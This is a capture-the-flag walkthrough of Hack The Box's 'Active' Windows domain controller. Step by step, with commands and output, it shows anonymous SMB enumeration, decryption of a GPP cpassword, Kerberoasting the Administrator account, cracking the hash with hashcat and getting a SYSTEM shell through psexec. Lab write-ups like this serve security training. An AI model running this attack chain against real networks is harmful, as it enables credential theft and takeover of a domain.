Join The Best Hacking Community Worldwide | Hack The Box
Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!
www.hackthebox.com
Nmap Scan
To begin, let's run an Nmap scan to identify the open ports and services on the target machine.
└─$ nmap -sC -sV -Pn -v 10.129.1.129
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-22 01:44:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1027/tcp filtered IIS
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3283/tcp filtered netassistant
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -1s
| smb2-time:
| date: 2024-10-22T01:45:47
|_ start_date: 2024-10-22T01:34:02
NSE: Script Post-scanning.
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.02 seconds
Raw packets sent: 1521 (66.924KB) | Rcvd: 1052 (46.485KB)
Key results from the scan:
- The server appears to be running Windows Server 2008 R2 SP1.
- Several important ports are open, including DNS (53), Kerberos (88), LDAP (389), SMB (445), and RPC services.
Adding Host Entry
Next, add the target's domain to our /etc/hosts file to make subsequent interactions easier:
echo "10.129.1.129 active.htb" | sudo tee -a /etc/hostsEnumerating SMB Shares
How many SMB shares are shared by the target? 7
To determine how many SMB shares, use smbclient:
└─$ smbclient -L \\\\10.129.1.129\\
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Results:
- A total of 7 shares are available, including
ReplicationandUsers. - The
Replicationshare allows anonymous read access.
You can also run nxc smb to enumerate shares
└─$ nxc smb active.htb -u '' -p '' --shares
SMB 10.129.1.129 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.129 445 DC [+] active.htb\:
SMB 10.129.1.129 445 DC [*] Enumerated shares
SMB 10.129.1.129 445 DC Share Permissions Remark
SMB 10.129.1.129 445 DC ----- ----------- ------
SMB 10.129.1.129 445 DC ADMIN$ Remote Admin
SMB 10.129.1.129 445 DC C$ Default share
SMB 10.129.1.129 445 DC IPC$ Remote IPC
SMB 10.129.1.129 445 DC NETLOGON Logon server share
SMB 10.129.1.129 445 DC Replication READ
SMB 10.129.1.129 445 DC SYSVOL Logon server share
SMB 10.129.1.129 445 DC Users What is the name of the share that allows anonymous read access? Replication
Accessing the Replication Share
Which file has encrypted account credentials in it? Hint: It's an XML file. Groups.xml.
Method 1:
To dig deeper into ‘Replication’, I unleashed Netexec’s spider module. This handy tool crawls through the share, much like a spider exploring every nook and cranny of its web. It downloads files as it goes, which means I could sit back and let it gather all the goodies.
└─$ nxc smb active.htb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.129.1.129 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.129 445 DC [+] active.htb\:
SPIDER_PLUS 10.129.1.129 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.1.129 445 DC [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.1.129 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.129.1.129 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.1.129 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.1.129 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.1.129 445 DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.129.1.129 445 DC [*] Enumerated shares
SMB 10.129.1.129 445 DC Share Permissions Remark
SMB 10.129.1.129 445 DC ----- ----------- ------
SMB 10.129.1.129 445 DC ADMIN$ Remote Admin
SMB 10.129.1.129 445 DC C$ Default share
SMB 10.129.1.129 445 DC IPC$ Remote IPC
SMB 10.129.1.129 445 DC NETLOGON Logon server share
SMB 10.129.1.129 445 DC Replication READ
SMB 10.129.1.129 445 DC SYSVOL Logon server share
SMB 10.129.1.129 445 DC Users
SPIDER_PLUS 10.129.1.129 445 DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.1.129.json".
SPIDER_PLUS 10.129.1.129 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.1.129 445 DC [*] SMB Readable Shares: 1 (Replication)
SPIDER_PLUS 10.129.1.129 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.129.1.129 445 DC [*] Total files found: 7
SPIDER_PLUS 10.129.1.129 445 DC [*] File size average: 1.16 KB
SPIDER_PLUS 10.129.1.129 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.129.1.129 445 DC [*] File size max: 3.63 KB
SPIDER_PLUS 10.129.1.129 445 DC [*] File unique exts: 4 (.xml, .inf, .pol, .ini)
SPIDER_PLUS 10.129.1.129 445 DC [*] Downloads successful: 7
SPIDER_PLUS 10.129.1.129 445 DC [+] All files processed successfully.Method 2: Alternatively, you can access the share using smbclient, enable recursive listing and search for .xml files:
Get Groups.xml file
└─$ smbclient \\\\10.129.1.129\\Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
smb: \> recurse ON
smb: \> ls
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> mget Groups.xml
Get file Groups.xml? yes
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
Decrypting the Password
Upon opening the Groups.xml we can see an encrypted cpassword for the user active.htb\SVC_TGS
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
The Groups.xml file is identified as a Group Policy Preferences (GPP) file, which stores passwords encrypted with AES-256. We use the gpp-decrypt tool to retrieve the password:
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18What is the decrpyted password for the SVC_TGS account? GPPstillStandingStrong2k18
Validating Credentials
With the username SVC_TGS and the decrypted password, validate access using nxc smb:
└─$ nxc smb active.htb -u 'SVC_TGS' -p GPPstillStandingStrong2k18
SMB 10.129.1.129 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.129 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 The credentials are valid, and we can now access additional shares, including the Users share.
└─$ nxc smb active.htb -u 'SVC_TGS' -p GPPstillStandingStrong2k18 --shares
SMB 10.129.1.129 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.129 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.1.129 445 DC [*] Enumerated shares
SMB 10.129.1.129 445 DC Share Permissions Remark
SMB 10.129.1.129 445 DC ----- ----------- ------
SMB 10.129.1.129 445 DC ADMIN$ Remote Admin
SMB 10.129.1.129 445 DC C$ Default share
SMB 10.129.1.129 445 DC IPC$ Remote IPC
SMB 10.129.1.129 445 DC NETLOGON READ Logon server share
SMB 10.129.1.129 445 DC Replication READ
SMB 10.129.1.129 445 DC SYSVOL READ Logon server share
SMB 10.129.1.129 445 DC Users READ
Retrieving User Flag
Using smbclient, we connect to the Users share to retrieve the user.txt file.
Navigate to the SVC_TGS\Desktop directory, find the user.txt and download it.
└─$ smbclient \\\\10.129.1.129\\Users --user=active.htb/SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5204078 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5204078 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Mon Oct 21 21:34:59 2024
10459647 blocks of size 4096. 5204078 blocks available
smb: \SVC_TGS\Desktop\> cat user.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
Get file user.txt? yes
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)The User Flag is
└─$ cat user.txt
43d6c8971545f31bf3e0dc8fea6afcfdKerberoasting
To escalate privileges, we attempt a Kerberoasting attack. Before proceeding further, we need to ensure our system clock is in sync with the Domain Controller, as time synchronisation is crucial for handling Kerberos tickets. We use ntpdate to synchronise our clock with the DC:
└─$ sudo ntpdate active.htb
2024-10-21 22:47:07.748134 (-0400) -0.512112 +/- 0.077772 active.htb 10.129.1.129 s1 no-leap
CLOCK: time stepped by -0.512112We then use Impacket's GetUserSPNs.py to locate Kerberoastable users:
└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.129.1.129 active.htb/SVC_TGS
[sudo] password for kali:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2024-10-21 21:35:03.826139
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$494a55ffbf2b8b7bfdbdc27439d277426bc8ae765034354f2075d062657995370408e9eb10ad117a934f040434bc111fcef520e888f5ece36a2ce4d94b0f5b575fff1664f77b13eaf03fc17dc4188b6f7a0455d29aaa2c2163a3b7d1eb27ed78d2f2fa306cfc42894679a3984f663ace6cb6760a98dac6e4401a20cd9b8c2ca476807f3b6c5b29dec1880908444513ec8e6df77f91e29e9ce4dd407eaf106ca89f730d0881420c9ac9df47791bf5c179c5d70645132624ba76c15b0fccf9c19d1b1ef6600e86d8b9c098ce7def46f9f55a2c945cb2ceb4eed84b5417040f62f8828c18e894f63feb7182391c7bc3d585b2063b1c06591d413ffa0e58a68742e5382cd50a6f18eeefdf122dd34888acd029380947278afa274ed09c8fac3c8ce9a042703d07008e387848af1afc2b9125d261e1553a4e8503eddba2cb0d81b47d8aa44fd408d89a40d186953cc9d03e73e29b936a8ed403a22496c86c62fc142a786fd613f272476132d5e0a54099f91021b2835a6433d4113f5fd0567062e8e9f863f0322b58bf0cef8d4dc6f6dfcab472b401fe44158d48fcdc2509995efc92a8e270204cb1b86669dfcfdb9cb39206fed27c135d0c4426e55fd17380c2e4065fb7a1a79b4ad6b126d16399cb51bc438756242247eded65439c315fcfe189b0b6e728b4f7af159548d89906d7093329371ba550ff69146dcff3f047dd8697191707d59efa2dfb89da3079c482024d1a3b67d8bc052d7c20752ef180d2dd2a473380c6e02fb0265b75ca9a87a62b92be9d73fafcd367077f661b2afd8fde73ac97d103ac8b9ea979cbe39c4787b8f92b73c7630bc6f2eb196e4a31dcb1c43fda5933e181cc99b4a316efe58ca562b9e2bda9ce04cc510adc0d0d3b8ba90c5d885b8ec249e5f977d1bf68aba0df7e4284a65eabaab386e8b6949ba906de39e9e29c997a364566b5d116a4eca290fd34e75b3405de0ff637998214d10a361c3bae032cee496e6937cb364ab007cc90aa5b003cc7eac18f4a3f7d32b082c3a060d73c72deb52b0bb1df649862a1f218be6758fd19cacb92d5fc3b7c44a400f9bfcb5167701e3b425078b0902fbe9c7703ffb4c29953ee939772685dc1743147346f2def8f8ab870f5ec2cb0b3c88c0c63b02f01745281a4b3894d0f704e7a2d8ad78b2bb7c691de9669b19a7fc92103827c27c4d8c8c04b7567cb044b174f4ed01f712bd059909008d960859740c4163f59bfd994067fffcf0badc0
Which service account on Active is vulnerable to Kerberoasting? Administrator
A TGS-REP hash for the Administrator account is found. Save this hash to a file and use Hashcat to crack it.
To find out the hashcat module number, run:
hashcat --help | grep -i "Kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocolsudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$494a55ffbf2b8b7bfdbdc27439d277426bc8ae765034354f2075d062657995370408e9eb10ad117a934f040434bc111fcef520e888f5ece36a2ce4d94b0f5b575fff1664f77b13eaf03fc17dc4188b6f7a0455d29aaa2c2163a3b7d1eb27ed78d2f2fa306cfc42894679a3984f663ace6cb6760a98dac6e4401a20cd9b8c2ca476807f3b6c5b29dec1880908444513ec8e6df77f91e29e9ce4dd407eaf106ca89f730d0881420c9ac9df47791bf5c179c5d70645132624ba76c15b0fccf9c19d1b1ef6600e86d8b9c098ce7def46f9f55a2c945cb2ceb4eed84b5417040f62f8828c18e894f63feb7182391c7bc3d585b2063b1c06591d413ffa0e58a68742e5382cd50a6f18eeefdf122dd34888acd029380947278afa274ed09c8fac3c8ce9a042703d07008e387848af1afc2b9125d261e1553a4e8503eddba2cb0d81b47d8aa44fd408d89a40d186953cc9d03e73e29b936a8ed403a22496c86c62fc142a786fd613f272476132d5e0a54099f91021b2835a6433d4113f5fd0567062e8e9f863f0322b58bf0cef8d4dc6f6dfcab472b401fe44158d48fcdc2509995efc92a8e270204cb1b86669dfcfdb9cb39206fed27c135d0c4426e55fd17380c2e4065fb7a1a79b4ad6b126d16399cb51bc438756242247eded65439c315fcfe189b0b6e728b4f7af159548d89906d7093329371ba550ff69146dcff3f047dd8697191707d59efa2dfb89da3079c482024d1a3b67d8bc052d7c20752ef180d2dd2a473380c6e02fb0265b75ca9a87a62b92be9d73fafcd367077f661b2afd8fde73ac97d103ac8b9ea979cbe39c4787b8f92b73c7630bc6f2eb196e4a31dcb1c43fda5933e181cc99b4a316efe58ca562b9e2bda9ce04cc510adc0d0d3b8ba90c5d885b8ec249e5f977d1bf68aba0df7e4284a65eabaab386e8b6949ba906de39e9e29c997a364566b5d116a4eca290fd34e75b3405de0ff637998214d10a361c3bae032cee496e6937cb364ab007cc90aa5b003cc7eac18f4a3f7d32b082c3a060d73c72deb52b0bb1df649862a1f218be6758fd19cacb92d5fc3b7c44a400f9bfcb5167701e3b425078b0902fbe9c7703ffb4c29953ee939772685dc1743147346f2def8f8ab870f5ec2cb0b3c88c0c63b02f01745281a4b3894d0f704e7a2d8ad78b2bb7c691de9669b19a7fc92103827c27c4d8c8c04b7567cb044b174f4ed01f712bd059909008d960859740c4163f59bfd994067fffcf0badc0:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
The cracked password is: Ticketmaster1968
Gaining Administrative Access
With the Administrator credentials, we use Impacket's psexec to gain a shell as nt authority\system:
└─$ impacket-psexec administrator@10.129.1.129
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.129.1.129.....
[*] Found writable share ADMIN$
[*] Uploading file SZHVJVMK.exe
[*] Opening SVCManager on 10.129.1.129.....
[*] Creating service QaoB on 10.129.1.129.....
[*] Starting service QaoB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.Once connected, we retrieve the root.txt flag from the Administrator's desktop:
C:\Users\Administrator\Desktop> type root.txt
8e97770dadbd61a37a8e041332d5e98d
C:\Users\Administrator\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DC
Primary Dns Suffix . . . . . . . : active.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : active.htb
.htb
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-A1-0A
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.129.1.129(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Lease Obtained. . . . . . . . . . : ��嫞, 22 ������妬 2024 4:33:55 ��
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Lease Expires . . . . . . . . . . : ��嫞, 22 ������妬 2024 6:33:56 ��
Default Gateway . . . . . . . . . : 10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\Users\Administrator\Desktop> whoami
nt authority\system
References
- https://medium.com/@sanskarkalra121/cracking-active-unmasking-the-gpp-passwords-and-roasting-my-way-to-admin-access-ff439b9995c9